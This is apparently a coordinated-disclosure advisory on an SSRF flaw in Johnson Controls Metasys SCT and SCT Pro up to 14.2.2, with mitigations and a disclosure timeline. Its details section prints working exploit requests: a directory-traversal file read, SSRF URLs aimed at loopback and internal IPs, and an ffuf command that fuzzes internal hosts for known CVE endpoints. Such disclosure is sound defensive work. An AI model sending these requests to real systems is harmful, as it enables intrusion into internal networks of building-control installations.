Summary

A Server-Side Request Forgery (SSRF) vulnerability has been discovered in the Johnson Controls System Configuration Tool (SCT) and System Configuration Tool Pro (SCT Pro).

Vendor

Johnson Controls Inc.

Affected Version(s)

Metasys System Configuration Tool (SCT) <= 14.2.2
Metasys System Configuration Tool Pro (SCT Pro) <= 14.2.2

Risk Assessment

Clandestine Labs assesses that this vulnerability could be used to forge requests to internal systems. This could in-turn allow an attacker to identify endpoints on underlying servers and potentially even gain a foothold into the internal network through exploitation of said internal systems using forged web requests.

Mitigation

Johnson Controls has suggested either updating SCT/SCT Pro with patch 14.2.2 or upgrading SCT/SCT Pro to version 15 in order to mitigate this vulnerability. Additionally, CISA recommends users should:

Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.

Vulnerability Details

By supplying a parameter of the SCT_RepositoryHandler endpoint with a directory traversal sequence followed by the path to a system file, the researchers discovered a descriptive error message was being displayed based on the content of the file at the path provided. As an example, take a look at the following request:

https://vulnerable-target.clandestinelabs.io/SCTPro/Handlers/SCT_RepositoryHandler.ashx?method=CreateHelpUpdateTask&parameter=..\..\..\ProgramData\Johnson%20Controls\MetasysIII\CCT\UI\upload.caf

The above request would result in an error message stating that an unexpected character was encountered while parsing the value ‘P’ at line 0, position 0. As such, the researchers could only identify the first character of the file they were accessing via the directory traversal sequence.

{"IsSuccess":false,"Message":"Unexpected character encountered while parsing value: P. Path '', line 0, position 0."}

After some trial and error, the LFI testing was put to a halt and the researchers decided to go a different route. By supplying a remote URL in the parameter parameter, an interesting response was received:

https://vulnerable-target.clandestinelabs.io/SCTPro/Handlers/SCT_RepositoryHandler.ashx?method=CreateHelpUpdateTask&parameter=https://1.2.3.4

This error indicated that the server was attempting to reach out to the address supplied in the parameter, hinting at a potential SSRF vulnerability. To verify the expected behavior, the loopback IP was supplied to the parameter:

https://vulnerable-target.clandestinelabs.io/SCTPro/Handlers/SCT_RepositoryHandler.ashx?method=CreateHelpUpdateTask&parameter=https://127.0.0.1

As shown above, this resulted in a similar error message as when accessing a file on the local system. The unexpected character < aligns with the opening bracket of the <html> tag that would be at the beginning of the index.html file. This all but confirmed the behavior of what would be expected from a SSRF vulnerability. As a final step to verify the vulnerability, the researchers crafted requests to known internal IP addresses:

https://vulnerable-target.clandestinelabs.io/SCTPro/Handlers/SCT_RepositoryHandler.ashx?method=CreateHelpUpdateTask&parameter=https://10.0.0.1

https://vulnerable-target.clandestinelabs.io/SCTPro/Handlers/SCT_RepositoryHandler.ashx?method=CreateHelpUpdateTask&parameter=https://10.0.0.2

As expected, the 403 Forbidden and 404 Not Found error codes at the remote hosts confirmed the existence of the vulnerability. To exploit this, an attacker could simply use a web fuzzing tool such as ffuf in combination with a list of known CVE endpoints. Below is a command-line example of how an attacker could potentially exploit this vulnerability to gain a foothold into your internal network:

ffuf -w /opt/wordlists/cve-list.txt -u https://vulnerable-target.clandestinelabs.io/SCTPro/Handlers/SCT_RepositoryHandler.ashx?method=CreateHelpUpdateTask&parameter=https://10.0.0.1/FUZZ

Due to the ease of exploitability of this vulnerability, we recommend following the guidance provided in Johnson Controls Product Security Advisory JCI-PSA-2022-03 v1. See the reference section below for more information.

References

https://www.johnsoncontrols.com/cyber-solutions/security-advisories

https://www.cisa.gov/uscert/ics/advisories/icsa-22-111-02

https://nvd.nist.gov/vuln/detail/CVE-2021-36203

https://www.scottyrotten.com/writeups/icsa_22_111_02/

Credits

Scott Ponte, Founder at Black Harbor

Tony West, Founder & Lead Researcher at Clandestine Labs

Disclosure Timeline

June 5, 2021 - Discovered the vulnerability and reported to the affected organization

June 5, 2021 - Contacted the vendor to report the vulnerability

June 13, 2021 - Contacted the vendor to follow up and verify receipt of the vulnerability report

October 27, 2021 - Contacted ICS-CERT (CISA) for disclosure assistance

November 2, 2021 - Received response from Johnson Controls.

January 16, 2022 - Checked with vendor on ETA for patch/security advisory.

January 20, 2022 - Received response from vendor indicating patches would be ready by March.

March 10, 2022 - Received notification of patch, coordinated with vendor and CISA for disclosure.

April 21, 2022 - JCI-PSA-2022-03 published by Johnson Controls.

April 21, 2022 - ICSA-22-111-02 published by CISA.

Advisory: Johnson Controls System Configuration Tool (SCT) and SCT Pro <= 14.2.2